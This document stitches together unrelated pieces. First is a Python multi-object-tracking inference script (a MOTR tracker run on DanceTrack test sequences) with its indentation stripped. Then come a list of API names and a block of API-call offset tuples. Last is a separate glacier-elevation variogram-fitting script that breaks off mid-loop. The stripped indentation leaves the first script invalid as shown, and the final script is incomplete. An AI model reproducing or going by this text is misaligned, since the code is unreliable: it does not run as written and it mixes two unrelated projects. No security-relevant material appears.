def plot_one_box(x, img, color=None, label=None, score=None, line_thickness=None):
# Plots one bounding box on image img
# tl = line_thickness or round(
# 0.002 * max(img.shape[0:2])) + 1 # line thickness
tl = 2
color = color or [random.randint(0, 255) for _ in range(3)]
c1, c2 = (int(x[0]), int(x[1])), (int(x[2]), int(x[3]))
cv2.rectangle(img, c1, c2, color, thickness=tl)
if label:
tf = max(tl - 1, 1) # font thickness
t_size = cv2.getTextSize(label, 0, fontScale=tl / 3, thickness=tf)[0]
c2 = c1[0] + t_size[0], c1[1] - t_size[1] - 3
cv2.rectangle(img, c1, c2, color, -1) # filled
cv2.putText(img,
label, (c1[0], c1[1] - 2),
0,
tl / 3, [225, 255, 255],
thickness=tf,
lineType=cv2.LINE_AA)
if score is not None:
cv2.putText(img, score, (c1[0], c1[1] + 30), 0, tl / 3, [225, 255, 255], thickness=tf, lineType=cv2.LINE_AA)
return img
'''
Drawing helper from Deep SORT: draws the boxes directly on the original image.
'''
def draw_bboxes(ori_img, bbox, identities=None, offset=(0, 0), cvt_color=False):
if cvt_color:
ori_img = cv2.cvtColor(np.asarray(ori_img), cv2.COLOR_RGB2BGR)
img = ori_img
for i, box in enumerate(bbox):
x1, y1, x2, y2 = [int(i) for i in box[:4]]
x1 += offset[0]
x2 += offset[0]
y1 += offset[1]
y2 += offset[1]
if len(box) > 4:
score = '{:.2f}'.format(box[4])
else:
score = None
# box text and bar
id = int(identities[i]) if identities is not None else 0
color = COLORS_10[id % len(COLORS_10)]
label = '{:d}'.format(id)
# t_size = cv2.getTextSize(label, cv2.FONT_HERSHEY_PLAIN, 2 , 2)[0]
img = plot_one_box([x1, y1, x2, y2], img, color, label, score=score)
return img
def draw_points(img: np.ndarray, points: np.ndarray, color=(255, 255, 255)) -> np.ndarray:
assert len(points.shape) == 2 and points.shape[1] == 2, 'invalid points shape: {}'.format(points.shape)
for i, (x, y) in enumerate(points):
if i >= 300:
color = (0, 255, 0)
cv2.circle(img, (int(x), int(y)), 2, color=color, thickness=2)
return img
def tensor_to_numpy(tensor: torch.Tensor) -> np.ndarray:
return tensor.detach().cpu().numpy()
class Track(object):
track_cnt = 0
def __init__(self, box):
self.box = box
self.time_since_update = 0
self.id = Track.track_cnt
Track.track_cnt += 1
self.miss = 0
def miss_one_frame(self):
self.miss += 1
def clear_miss(self):
self.miss = 0
def update(self, box):
self.box = box
self.clear_miss()
class MOTR(object):
def __init__(self, max_age=1, min_hits=3, iou_threshold=0.3):
"""
Sets key parameters for SORT
"""
self.max_age = max_age
self.min_hits = min_hits
self.iou_threshold = iou_threshold
self.trackers = []
self.frame_count = 0
self.active_trackers = {}
self.inactive_trackers = {}
self.disappeared_tracks = []
def _remove_track(self, slot_id):
self.inactive_trackers.pop(slot_id)
self.disappeared_tracks.append(slot_id)
def clear_disappeared_track(self):
self.disappeared_tracks = []
def update(self, dt_instances: Instances):
"""
Params:
dets - a numpy array of detections in the format [[x1,y1,x2,y2,score],[x1,y1,x2,y2,score],...]
Requires: this method must be called once for each frame even with empty detections (use np.empty((0, 5)) for frames without detections).
Returns the a similar array, where the last column is the object ID.
NOTE: The number of objects returned may differ from the number of detections provided.
"""
self.frame_count += 1
# get predicted locations from existing trackers.
dt_idxes = set(dt_instances.obj_idxes.tolist())
track_idxes = set(self.active_trackers.keys()).union(set(self.inactive_trackers.keys()))
matched_idxes = dt_idxes.intersection(track_idxes)
unmatched_tracker = track_idxes - matched_idxes
for track_id in unmatched_tracker:
# miss in this frame, move to inactive_trackers.
if track_id in self.active_trackers:
self.inactive_trackers[track_id] = self.active_trackers.pop(track_id)
self.inactive_trackers[track_id].miss_one_frame()
if self.inactive_trackers[track_id].miss > 10:
self._remove_track(track_id)
for i in range(len(dt_instances)):
idx = dt_instances.obj_idxes[i]
bbox = np.concatenate([dt_instances.boxes[i], dt_instances.scores[i:i+1]], axis=-1)
label = dt_instances.labels[i]
if label == 0:
# get a positive track.
if idx in self.inactive_trackers:
# set state of track active.
self.active_trackers[idx] = self.inactive_trackers.pop(idx)
if idx not in self.active_trackers:
# create a new track.
self.active_trackers[idx] = Track(idx)
self.active_trackers[idx].update(bbox)
elif label == 1:
# get an occluded track.
if idx in self.active_trackers:
# set state of track inactive.
self.inactive_trackers[idx] = self.active_trackers.pop(idx)
if idx not in self.inactive_trackers:
# It's strange to obtain a new occluded track.
                    # TODO: think of a more rational way to handle this case.
self.inactive_trackers[idx] = Track(idx)
self.inactive_trackers[idx].miss_one_frame()
if self.inactive_trackers[idx].miss > 10:
self._remove_track(idx)
ret = []
for i in range(len(dt_instances)):
label = dt_instances.labels[i]
if label == 0:
id = dt_instances.obj_idxes[i]
box_with_score = np.concatenate([dt_instances.boxes[i], dt_instances.scores[i:i+1]], axis=-1)
ret.append(np.concatenate((box_with_score, [id + 1])).reshape(1, -1)) # +1 as MOT benchmark requires positive
if len(ret) > 0:
return np.concatenate(ret)
return np.empty((0, 6))
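# A minimal usage sketch for MOTR (dt_instances stands for the Instances
# object produced by the detection model for one frame; it is not
# constructed here):
#
#   tracker = MOTR()
#   outputs = tracker.update(dt_instances)
#   # outputs has shape (n, 6): [x1, y1, x2, y2, score, track_id]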
def load_label(label_path: str, img_size: tuple) -> dict:
labels0 = np.loadtxt(label_path, dtype=np.float32).reshape(-1, 6)
h, w = img_size
    # Normalized cxcywh to pixel xyxy format
labels = labels0.copy()
labels[:, 2] = w * (labels0[:, 2] - labels0[:, 4] / 2)
labels[:, 3] = h * (labels0[:, 3] - labels0[:, 5] / 2)
labels[:, 4] = w * (labels0[:, 2] + labels0[:, 4] / 2)
labels[:, 5] = h * (labels0[:, 3] + labels0[:, 5] / 2)
targets = {'boxes': [], 'labels': [], 'area': []}
num_boxes = len(labels)
visited_ids = set()
for label in labels[:num_boxes]:
obj_id = label[1]
if obj_id in visited_ids:
continue
visited_ids.add(obj_id)
targets['boxes'].append(label[2:6].tolist())
        targets['area'].append((label[4] - label[2]) * (label[5] - label[3]))  # pixel area of the box: (x2 - x1) * (y2 - y1)
targets['labels'].append(0)
targets['boxes'] = np.asarray(targets['boxes'])
targets['area'] = np.asarray(targets['area'])
targets['labels'] = np.asarray(targets['labels'])
return targets
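# Worked example of the normalized-cxcywh -> pixel-xyxy conversion performed
# in load_label, with made-up numbers: for an image of h=100, w=200 and a
# label whose normalized (cx, cy, bw, bh) = (0.5, 0.5, 0.2, 0.4):
#   x1 = 200 * (0.5 - 0.2 / 2) = 80     y1 = 100 * (0.5 - 0.4 / 2) = 30
#   x2 = 200 * (0.5 + 0.2 / 2) = 120    y2 = 100 * (0.5 + 0.4 / 2) = 70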
def filter_pub_det(res_file, pub_det_file, filter_iou=False):
frame_boxes = {}
with open(pub_det_file, 'r') as f:
lines = f.readlines()
for line in lines:
if len(line) == 0:
continue
elements = line.strip().split(',')
frame_id = int(elements[0])
x1, y1, w, h = elements[2:6]
x1, y1, w, h = float(x1), float(y1), float(w), float(h)
x2 = x1 + w - 1
y2 = y1 + h - 1
if frame_id not in frame_boxes:
frame_boxes[frame_id] = []
frame_boxes[frame_id].append([x1, y1, x2, y2])
for frame, boxes in frame_boxes.items():
frame_boxes[frame] = np.array(boxes)
ids = {}
num_filter_box = 0
with open(res_file, 'r') as f:
lines = f.readlines()
with open(res_file, 'w') as f:
for line in lines:
if len(line) == 0:
continue
elements = line.strip().split(',')
frame_id, obj_id = elements[:2]
frame_id = int(frame_id)
obj_id = int(obj_id)
x1, y1, w, h = elements[2:6]
x1, y1, w, h = float(x1), float(y1), float(w), float(h)
x2 = x1 + w - 1
y2 = y1 + h - 1
if obj_id not in ids:
# track initialization.
if frame_id not in frame_boxes:
num_filter_box += 1
print("filter init box {} {}".format(frame_id, obj_id))
continue
pub_dt_boxes = frame_boxes[frame_id]
dt_box = np.array([[x1, y1, x2, y2]])
if filter_iou:
max_iou = bbox_iou(dt_box, pub_dt_boxes).max()
if max_iou < 0.5:
num_filter_box += 1
print("filter init box {} {}".format(frame_id, obj_id))
continue
else:
pub_dt_centers = (pub_dt_boxes[:, :2] + pub_dt_boxes[:, 2:4]) * 0.5
x_inside = (dt_box[0, 0] <= pub_dt_centers[:, 0]) & (dt_box[0, 2] >= pub_dt_centers[:, 0])
y_inside = (dt_box[0, 1] <= pub_dt_centers[:, 1]) & (dt_box[0, 3] >= pub_dt_centers[:, 1])
center_inside:np.ndarray = x_inside & y_inside
if not center_inside.any():
num_filter_box += 1
print("filter init box {} {}".format(frame_id, obj_id))
continue
print("save init track {} {}".format(frame_id, obj_id))
ids[obj_id] = True
f.write(line)
print("totally {} boxes are filtered.".format(num_filter_box))
class ListImgDataset(Dataset):
def __init__(self, img_list) -> None:
super().__init__()
self.img_list = img_list
'''
common settings
'''
self.img_height = 800
self.img_width = 1536
self.mean = [0.485, 0.456, 0.406]
self.std = [0.229, 0.224, 0.225]
def load_img_from_file(self, f_path):
label_path = f_path.replace('images', 'labels_with_ids').replace('.png', '.txt').replace('.jpg', '.txt')
cur_img = cv2.imread(f_path)
assert cur_img is not None, f_path
cur_img = cv2.cvtColor(cur_img, cv2.COLOR_BGR2RGB)
targets = load_label(label_path, cur_img.shape[:2]) if os.path.exists(label_path) else None
return cur_img, targets
def init_img(self, img):
ori_img = img.copy()
self.seq_h, self.seq_w = img.shape[:2]
scale = self.img_height / min(self.seq_h, self.seq_w)
if max(self.seq_h, self.seq_w) * scale > self.img_width:
scale = self.img_width / max(self.seq_h, self.seq_w)
target_h = int(self.seq_h * scale)
target_w = int(self.seq_w * scale)
img = cv2.resize(img, (target_w, target_h))
img = F.normalize(F.to_tensor(img), self.mean, self.std)
img = img.unsqueeze(0)
return img, ori_img
def __len__(self):
return len(self.img_list)
def __getitem__(self, index):
img, targets = self.load_img_from_file(self.img_list[index])
return self.init_img(img)
class Detector(object):
def __init__(self, args, model=None, seq_num=2):
self.args = args
self.detr = model
self.seq_num = seq_num
img_list = os.listdir(os.path.join(self.args.mot_path, 'DanceTrack/test', self.seq_num, 'img1'))
img_list = [os.path.join(self.args.mot_path, 'DanceTrack/test', self.seq_num, 'img1', _) for _ in img_list if
('jpg' in _) or ('png' in _)]
self.img_list = sorted(img_list)
self.img_len = len(self.img_list)
self.tr_tracker = MOTR()
self.save_path = os.path.join(self.args.output_dir, 'results/{}'.format(seq_num))
os.makedirs(self.save_path, exist_ok=True)
self.predict_path = os.path.join(self.args.output_dir, args.exp_name)
os.makedirs(self.predict_path, exist_ok=True)
if os.path.exists(os.path.join(self.predict_path, f'{self.seq_num}.txt')):
os.remove(os.path.join(self.predict_path, f'{self.seq_num}.txt'))
@staticmethod
def filter_dt_by_score(dt_instances: Instances, prob_threshold: float) -> Instances:
keep = dt_instances.scores > prob_threshold
return dt_instances[keep]
@staticmethod
def filter_dt_by_area(dt_instances: Instances, area_threshold: float) -> Instances:
wh = dt_instances.boxes[:, 2:4] - dt_instances.boxes[:, 0:2]
areas = wh[:, 0] * wh[:, 1]
keep = areas > area_threshold
return dt_instances[keep]
@staticmethod
def write_results(txt_path, frame_id, bbox_xyxy, identities):
save_format = '{frame},{id},{x1},{y1},{w},{h},1,-1,-1,-1\n'
with open(txt_path, 'a') as f:
for xyxy, track_id in zip(bbox_xyxy, identities):
                if track_id is None or track_id < 0:  # check None first to avoid comparing None with an int
continue
x1, y1, x2, y2 = xyxy
w, h = x2 - x1, y2 - y1
line = save_format.format(frame=int(frame_id), id=int(track_id), x1=x1, y1=y1, w=w, h=h)
f.write(line)
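    # Example of a line produced by write_results (illustrative values):
    # frame 1, track id 3, top-left corner (100.0, 50.0), width 40.0 and
    # height 80.0 yield "1,3,100.0,50.0,40.0,80.0,1,-1,-1,-1".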
def eval_seq(self):
data_root = os.path.join(self.args.mot_path, 'MOT15/images/train')
result_filename = os.path.join(self.predict_path, 'gt.txt')
evaluator = Evaluator(data_root, self.seq_num)
accs = evaluator.eval_file(result_filename)
return accs
@staticmethod
def visualize_img_with_bbox(img_path, img, dt_instances: Instances, ref_pts=None, gt_boxes=None):
if dt_instances.has('scores'):
img_show = draw_bboxes(img, np.concatenate([dt_instances.boxes, dt_instances.scores.reshape(-1, 1)], axis=-1), dt_instances.obj_idxes)
else:
img_show = draw_bboxes(img, dt_instances.boxes, dt_instances.obj_idxes)
if ref_pts is not None:
img_show = draw_points(img_show, ref_pts)
if gt_boxes is not None:
img_show = draw_bboxes(img_show, gt_boxes, identities=np.ones((len(gt_boxes), )) * -1)
cv2.imwrite(img_path, img_show)
def detect(self, prob_threshold=0.7, area_threshold=100, vis=False):
last_dt_embedding = None
total_dts = 0
total_occlusion_dts = 0
track_instances = None
loader = DataLoader(ListImgDataset(self.img_list), 1, num_workers=2)
        # create/empty the gt file before the evaluation loop
        with open(os.path.join(self.predict_path, 'gt.txt'), 'w'):
            pass
for i, (cur_img, ori_img) in enumerate(tqdm(loader)):
cur_img, ori_img = cur_img[0], ori_img[0]
# track_instances = None
if track_instances is not None:
track_instances.remove('boxes')
track_instances.remove('labels')
seq_h, seq_w, _ = ori_img.shape
res = self.detr.inference_single_image(cur_img.cuda().float(), (seq_h, seq_w), track_instances)
track_instances = res['track_instances']
all_ref_pts = tensor_to_numpy(res['ref_pts'][0, :, :2])
dt_instances = track_instances.to(torch.device('cpu'))
# filter det instances by score.
dt_instances = self.filter_dt_by_score(dt_instances, prob_threshold)
dt_instances = self.filter_dt_by_area(dt_instances, area_threshold)
total_dts += len(dt_instances)
if vis:
# for visual
cur_vis_img_path = os.path.join(self.save_path, 'frame_{}.jpg'.format(i))
gt_boxes = None
self.visualize_img_with_bbox(cur_vis_img_path, ori_img, dt_instances, ref_pts=all_ref_pts, gt_boxes=gt_boxes)
tracker_outputs = self.tr_tracker.update(dt_instances)
self.write_results(txt_path=os.path.join(self.predict_path, f'{self.seq_num}.txt'),
frame_id=(i + 1),
bbox_xyxy=tracker_outputs[:, :4],
identities=tracker_outputs[:, 5])
print("totally {} dts {} occlusion dts".format(total_dts, total_occlusion_dts))
if __name__ == '__main__':
parser = argparse.ArgumentParser('DETR training and evaluation script', parents=[get_args_parser()])
args = parser.parse_args()
if args.output_dir:
Path(args.output_dir).mkdir(parents=True, exist_ok=True)
# load model and weights
detr, _, _ = build_model(args)
checkpoint = torch.load(args.resume, map_location='cpu')
detr = load_model(detr, args.resume)
detr.eval()
detr = detr.cuda()
    # submission loop over the DanceTrack test sequences
sub_dir = 'DanceTrack/test'
seq_nums = os.listdir(os.path.join(args.mot_path, sub_dir))
for seq_num in seq_nums:
det = Detector(args, model=detr, seq_num=seq_num)
det.detect()
|
[
"numpy.random.seed",
"torchvision.transforms.functional.to_tensor",
"numpy.empty",
"pathlib.Path",
"cv2.rectangle",
"torch.device",
"os.path.join",
"random.randint",
"cv2.cvtColor",
"cv2.imwrite",
"torch.load",
"os.path.exists",
"numpy.loadtxt",
"util.tool.load_model",
"models.build_model",
"util.evaluation.Evaluator",
"cv2.resize",
"tqdm.tqdm",
"numpy.asarray",
"numpy.concatenate",
"cv2.putText",
"os.makedirs",
"main.get_args_parser",
"cv2.getTextSize",
"cv2.imread",
"numpy.array"
] |
[((1980, 2000), 'numpy.random.seed', 'np.random.seed', (['(2020)'], {}), '(2020)\n', (1994, 2000), True, 'import numpy as np\n'), ((3804, 3851), 'cv2.rectangle', 'cv2.rectangle', (['img', 'c1', 'c2', 'color'], {'thickness': 'tl'}), '(img, c1, c2, color, thickness=tl)\n', (3817, 3851), False, 'import cv2\n'), ((10835, 10863), 'numpy.asarray', 'np.asarray', (["targets['boxes']"], {}), "(targets['boxes'])\n", (10845, 10863), True, 'import numpy as np\n'), ((10886, 10913), 'numpy.asarray', 'np.asarray', (["targets['area']"], {}), "(targets['area'])\n", (10896, 10913), True, 'import numpy as np\n'), ((10938, 10967), 'numpy.asarray', 'np.asarray', (["targets['labels']"], {}), "(targets['labels'])\n", (10948, 10967), True, 'import numpy as np\n'), ((20491, 20508), 'models.build_model', 'build_model', (['args'], {}), '(args)\n', (20502, 20508), False, 'from models import build_model\n'), ((20526, 20569), 'torch.load', 'torch.load', (['args.resume'], {'map_location': '"""cpu"""'}), "(args.resume, map_location='cpu')\n", (20536, 20569), False, 'import torch\n'), ((20581, 20610), 'util.tool.load_model', 'load_model', (['detr', 'args.resume'], {}), '(detr, args.resume)\n', (20591, 20610), False, 'from util.tool import load_model\n'), ((4052, 4089), 'cv2.rectangle', 'cv2.rectangle', (['img', 'c1', 'c2', 'color', '(-1)'], {}), '(img, c1, c2, color, -1)\n', (4065, 4089), False, 'import cv2\n'), ((4108, 4219), 'cv2.putText', 'cv2.putText', (['img', 'label', '(c1[0], c1[1] - 2)', '(0)', '(tl / 3)', '[225, 255, 255]'], {'thickness': 'tf', 'lineType': 'cv2.LINE_AA'}), '(img, label, (c1[0], c1[1] - 2), 0, tl / 3, [225, 255, 255],\n thickness=tf, lineType=cv2.LINE_AA)\n', (4119, 4219), False, 'import cv2\n'), ((9940, 9956), 'numpy.empty', 'np.empty', (['(0, 6)'], {}), '((0, 6))\n', (9948, 9956), True, 'import numpy as np\n'), ((11697, 11712), 'numpy.array', 'np.array', (['boxes'], {}), '(boxes)\n', (11705, 11712), True, 'import numpy as np\n'), ((14231, 14249), 'cv2.imread', 'cv2.imread', (['f_path'], {}), '(f_path)\n', (14241, 14249), False, 'import cv2\n'), ((14311, 14351), 'cv2.cvtColor', 'cv2.cvtColor', (['cur_img', 'cv2.COLOR_BGR2RGB'], {}), '(cur_img, cv2.COLOR_BGR2RGB)\n', (14323, 14351), False, 'import cv2\n'), ((14882, 14919), 'cv2.resize', 'cv2.resize', (['img', '(target_w, target_h)'], {}), '(img, (target_w, target_h))\n', (14892, 14919), False, 'import cv2\n'), ((15896, 15938), 'os.makedirs', 'os.makedirs', (['self.save_path'], {'exist_ok': '(True)'}), '(self.save_path, exist_ok=True)\n', (15907, 15938), False, 'import os\n'), ((15968, 16017), 'os.path.join', 'os.path.join', (['self.args.output_dir', 'args.exp_name'], {}), '(self.args.output_dir, args.exp_name)\n', (15980, 16017), False, 'import os\n'), ((16026, 16071), 'os.makedirs', 'os.makedirs', (['self.predict_path'], {'exist_ok': '(True)'}), '(self.predict_path, exist_ok=True)\n', (16037, 16071), False, 'import os\n'), ((17305, 17359), 'os.path.join', 'os.path.join', (['self.args.mot_path', '"""MOT15/images/train"""'], {}), "(self.args.mot_path, 'MOT15/images/train')\n", (17317, 17359), False, 'import os\n'), ((17386, 17427), 'os.path.join', 'os.path.join', (['self.predict_path', '"""gt.txt"""'], {}), "(self.predict_path, 'gt.txt')\n", (17398, 17427), False, 'import os\n'), ((17448, 17482), 'util.evaluation.Evaluator', 'Evaluator', (['data_root', 'self.seq_num'], {}), '(data_root, self.seq_num)\n', (17457, 17482), False, 'from util.evaluation import Evaluator\n'), ((18186, 18217), 'cv2.imwrite', 'cv2.imwrite', (['img_path', 'img_show'], {}), 
'(img_path, img_show)\n', (18197, 18217), False, 'import cv2\n'), ((20739, 20775), 'os.path.join', 'os.path.join', (['args.mot_path', 'sub_dir'], {}), '(args.mot_path, sub_dir)\n', (20751, 20775), False, 'import os\n'), ((3698, 3720), 'random.randint', 'random.randint', (['(0)', '(255)'], {}), '(0, 255)\n', (3712, 3720), False, 'import random\n'), ((3929, 3986), 'cv2.getTextSize', 'cv2.getTextSize', (['label', '(0)'], {'fontScale': '(tl / 3)', 'thickness': 'tf'}), '(label, 0, fontScale=tl / 3, thickness=tf)\n', (3944, 3986), False, 'import cv2\n'), ((4358, 4470), 'cv2.putText', 'cv2.putText', (['img', 'score', '(c1[0], c1[1] + 30)', '(0)', '(tl / 3)', '[225, 255, 255]'], {'thickness': 'tf', 'lineType': 'cv2.LINE_AA'}), '(img, score, (c1[0], c1[1] + 30), 0, tl / 3, [225, 255, 255],\n thickness=tf, lineType=cv2.LINE_AA)\n', (4369, 4470), False, 'import cv2\n'), ((4648, 4667), 'numpy.asarray', 'np.asarray', (['ori_img'], {}), '(ori_img)\n', (4658, 4667), True, 'import numpy as np\n'), ((8219, 8297), 'numpy.concatenate', 'np.concatenate', (['[dt_instances.boxes[i], dt_instances.scores[i:i + 1]]'], {'axis': '(-1)'}), '([dt_instances.boxes[i], dt_instances.scores[i:i + 1]], axis=-1)\n', (8233, 8297), True, 'import numpy as np\n'), ((9905, 9924), 'numpy.concatenate', 'np.concatenate', (['ret'], {}), '(ret)\n', (9919, 9924), True, 'import numpy as np\n'), ((10031, 10071), 'numpy.loadtxt', 'np.loadtxt', (['label_path'], {'dtype': 'np.float32'}), '(label_path, dtype=np.float32)\n', (10041, 10071), True, 'import numpy as np\n'), ((14415, 14441), 'os.path.exists', 'os.path.exists', (['label_path'], {}), '(label_path)\n', (14429, 14441), False, 'import os\n'), ((14946, 14962), 'torchvision.transforms.functional.to_tensor', 'F.to_tensor', (['img'], {}), '(img)\n', (14957, 14962), True, 'import torchvision.transforms.functional as F\n'), ((15437, 15510), 'os.path.join', 'os.path.join', (['self.args.mot_path', '"""DanceTrack/test"""', 'self.seq_num', '"""img1"""'], {}), "(self.args.mot_path, 'DanceTrack/test', self.seq_num, 'img1')\n", (15449, 15510), False, 'import os\n'), ((15532, 15608), 'os.path.join', 'os.path.join', (['self.args.mot_path', '"""DanceTrack/test"""', 'self.seq_num', '"""img1"""', '_'], {}), "(self.args.mot_path, 'DanceTrack/test', self.seq_num, 'img1', _)\n", (15544, 15608), False, 'import os\n'), ((16098, 16152), 'os.path.join', 'os.path.join', (['self.predict_path', 'f"""{self.seq_num}.txt"""'], {}), "(self.predict_path, f'{self.seq_num}.txt')\n", (16110, 16152), False, 'import os\n'), ((18619, 18631), 'tqdm.tqdm', 'tqdm', (['loader'], {}), '(loader)\n', (18623, 18631), False, 'from tqdm import tqdm\n'), ((9656, 9734), 'numpy.concatenate', 'np.concatenate', (['[dt_instances.boxes[i], dt_instances.scores[i:i + 1]]'], {'axis': '(-1)'}), '([dt_instances.boxes[i], dt_instances.scores[i:i + 1]], axis=-1)\n', (9670, 9734), True, 'import numpy as np\n'), ((12604, 12632), 'numpy.array', 'np.array', (['[[x1, y1, x2, y2]]'], {}), '([[x1, y1, x2, y2]])\n', (12612, 12632), True, 'import numpy as np\n'), ((16177, 16231), 'os.path.join', 'os.path.join', (['self.predict_path', 'f"""{self.seq_num}.txt"""'], {}), "(self.predict_path, f'{self.seq_num}.txt')\n", (16189, 16231), False, 'import os\n'), ((18506, 18547), 'os.path.join', 'os.path.join', (['self.predict_path', '"""gt.txt"""'], {}), "(self.predict_path, 'gt.txt')\n", (18518, 18547), False, 'import os\n'), ((19188, 19207), 'torch.device', 'torch.device', (['"""cpu"""'], {}), "('cpu')\n", (19200, 19207), False, 'import torch\n'), ((20304, 
20321), 'main.get_args_parser', 'get_args_parser', ([], {}), '()\n', (20319, 20321), False, 'from main import get_args_parser\n'), ((20387, 20408), 'pathlib.Path', 'Path', (['args.output_dir'], {}), '(args.output_dir)\n', (20391, 20408), False, 'from pathlib import Path\n'), ((19866, 19920), 'os.path.join', 'os.path.join', (['self.predict_path', 'f"""{self.seq_num}.txt"""'], {}), "(self.predict_path, f'{self.seq_num}.txt')\n", (19878, 19920), False, 'import os\n'), ((9760, 9802), 'numpy.concatenate', 'np.concatenate', (['(box_with_score, [id + 1])'], {}), '((box_with_score, [id + 1]))\n', (9774, 9802), True, 'import numpy as np\n')]
|
import os, sys
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import scipy.optimize
from pyddem.volint_tools import neff_circ, std_err
import functools
import matplotlib.ticker as mtick
from mpl_toolkits.axes_grid.inset_locator import inset_axes
plt.rcParams.update({'font.size': 5})
plt.rcParams.update({'lines.linewidth':0.35})
plt.rcParams.update({'axes.linewidth':0.35})
plt.rcParams.update({'lines.markersize':2.5})
plt.rcParams.update({'axes.labelpad':1.5})
all_csv = '/home/atom/ongoing/work_worldwide/validation/tcorr/tinterp_corr_deseas_agg_all.csv'
# all_csv = '/home/atom/ongoing/work_worldwide/validation/tinterp_corr_agg_all.csv'
df = pd.read_csv(all_csv)
# df = df[df.reg==5]
cutoffs = list(set(list(df.cutoff)))
dts = sorted(list(set(list(df.nb_dt))))
col = ['tab:orange','tab:blue','tab:olive','tab:red','tab:cyan','tab:brown','tab:gray','tab:pink','tab:purple']
#plot covar by lag
# for dt in dts:
#
# df_dt = df[df.nb_dt == dt]
#
# for cutoff in cutoffs:
# df_c = df_dt[df_dt.cutoff == cutoff]
#
# if cutoff == 10000:
# plt.scatter(df_c.bins.values[1],df_c.exp.values[1],color=col[dts.index(dt)],label=str(dt))
# plt.scatter(df_c.bins.values[20],df_c.exp.values[20],color=col[dts.index(dt)])
# plt.scatter(df_c.bins.values[50],df_c.exp.values[50],color=col[dts.index(dt)])
# elif cutoff == 100000:
# plt.scatter(df_c.bins.values[20],df_c.exp.values[20],color=col[dts.index(dt)])
# plt.scatter(df_c.bins.values[50],df_c.exp.values[50],color=col[dts.index(dt)])
# else:
# plt.scatter(df_c.bins.values[20],df_c.exp.values[20],color=col[dts.index(dt)])
# plt.scatter(df_c.bins.values[50],df_c.exp.values[50],color=col[dts.index(dt)])
#
# plt.ylim([0,50])
# plt.xscale('log')
# plt.legend()
#plot covar by dt
dts = sorted(dts)
dts.remove(540.)
dts.remove(900.)
dts.remove(1750.)
dts.remove(2250.)
arr_res = np.zeros((len(dts),7))
arr_count = np.zeros((len(dts),7))
for dt in dts:
df_dt = df[df.nb_dt == dt]
for cutoff in cutoffs:
df_c = df_dt[df_dt.cutoff == cutoff]
if cutoff == 10000:
arr_res[dts.index(dt),0]=np.nanmean(df_c.exp.values[1:2])
arr_count[dts.index(dt),0]=np.nanmean(df_c['count'].values[1:2])
arr_res[dts.index(dt), 1] = np.nanmean(df_c.exp.values[20 - 10:20 + 10])
arr_count[dts.index(dt), 1] = np.nanmean(df_c['count'].values[20 - 10:20 + 10])
arr_res[dts.index(dt), 2] = np.nanmean(df_c.exp.values[50 - 10:50 + 10])
arr_count[dts.index(dt), 2] = np.nanmean(df_c['count'].values[50 - 10:50 + 10])
elif cutoff == 100000:
arr_res[dts.index(dt),3]=np.nanmean(df_c.exp.values[20-5:20+20])
arr_count[dts.index(dt),3]=np.nanmean(df_c['count'].values[20-10:20+10])
arr_res[dts.index(dt),4]=np.nanmean(df_c.exp.values[50-10:50+10])
arr_count[dts.index(dt),4]=np.nanmean(df_c['count'].values[50-10:50+10])
elif cutoff == 1000000:
arr_res[dts.index(dt),5]=np.nanmean(df_c.exp.values[20-10:20+30])
arr_count[dts.index(dt),5]=np.nanmean(df_c['count'].values[20-10:20+30])
arr_res[dts.index(dt),6]=np.nanmean(df_c.exp.values[50-40:50+40])
arr_count[dts.index(dt),6]=np.nanmean(df_c['count'].values[50-40:50+40])
arr_res[arr_count<100]=np.nan
# for dt in dts:
#
# df_dt = df[df.nb_dt == dt]
#
# for cutoff in cutoffs:
# df_c = df_dt[df_dt.cutoff == cutoff]
#
# if cutoff == 10000:
# plt.scatter(dt,df_c.exp.values[1],color=col[0])
# plt.scatter(dt,np.nanmean(df_c.exp.values[20-10:20+10]),color=col[1])
# plt.scatter(dt,np.nanmean(df_c.exp.values[50-10:50+10]),color=col[2])
# elif cutoff == 100000:
# plt.scatter(dt,np.nanmean(df_c.exp.values[20-10:20+10]),color=col[3])
# plt.scatter(dt,np.nanmean(df_c.exp.values[50-10:50+10]),color=col[4])
# else:
# plt.scatter(dt,np.nanmean(df_c.exp.values[20-10:20+10]),color=col[5])
# plt.scatter(dt,np.nanmean(df_c.exp.values[50-10:50+10]),color=col[6])
fig = plt.figure(figsize=(7.2,9.3))
# plt.subplots_adjust(hspace=0.3)
grid = plt.GridSpec(8, 13, wspace=0.05, hspace=0.5)
ax = fig.add_subplot(grid[:2,:2])
# ax = fig.add_subplot(2, 1, 1)
vario = df[df.nb_dt == 720.]
vec_bins = []
vec_exp = []
vgm1 = vario[vario.cutoff == 10000]
vgm1 = vgm1[vgm1.bins<3000]
for i in range(6):
vec_bins += [np.nanmean(vgm1.bins.values[0+i*5:5+i*5])]
vec_exp += [np.nanmean(vgm1.exp.values[0+i*5:5+i*5])]
# vec_bins += vgm1.bins.tolist()
# vec_exp += vgm1.exp.tolist()
vgm1 = vario[vario.cutoff == 100000]
vgm1 = vgm1[np.logical_and(vgm1.bins>3000,vgm1.bins<30000)]
vec_bins += vgm1.bins.tolist()
vec_exp += vgm1.exp.tolist()
vgm1 = vario[vario.cutoff == 1000000]
vgm1 = vgm1[vgm1.bins>30000]
for i in range(18):
vec_bins += [np.nanmean(vgm1.bins.values[0+i*5:5+i*5])]
vec_exp += [np.nanmean(vgm1.exp.values[0+i*5:5+i*5])]
vec_bins = np.array(vec_bins)
vec_exp=np.array(vec_exp)
def sph_var(c0,c1,a1,h):
if h < a1:
vgm = c0 + c1 * (3 / 2 * h / a1-1 / 2 * (h / a1) ** 3)
else:
vgm = c0 + c1
return vgm
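# Worked example for sph_var (illustrative numbers): with nugget c0 = 0,
# partial sill c1 = 10 and range a1 = 1000 m,
#   sph_var(0, 10, 1000, 500)  = 10 * (1.5 * 0.5 - 0.5 * 0.5 ** 3) = 6.875
#   sph_var(0, 10, 1000, 2000) = 10   (the full sill is reached beyond a1)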
vect = np.array(list(np.arange(0,3000,1)) + list(np.arange(3000,30000,10)) + list(np.arange(30000,3000000,100)))
mod = []
c1s = [0] + list(arr_res[dts.index(720.),:])
a1s = [0.2,2,5,20,50,200]
#find unbiased sills
list_c = []
for j in range(len(a1s)):
print('Range:' + str(a1s[-1 - j]))
c = c1s[-2 - j] - c1s[-3 - j]
print(c)
for k in range(j):
# c -= sph_var(0, list_c[k], a1s[-1 - k] * 1000, a1s[-1 - j] * 1000)
if j>5:
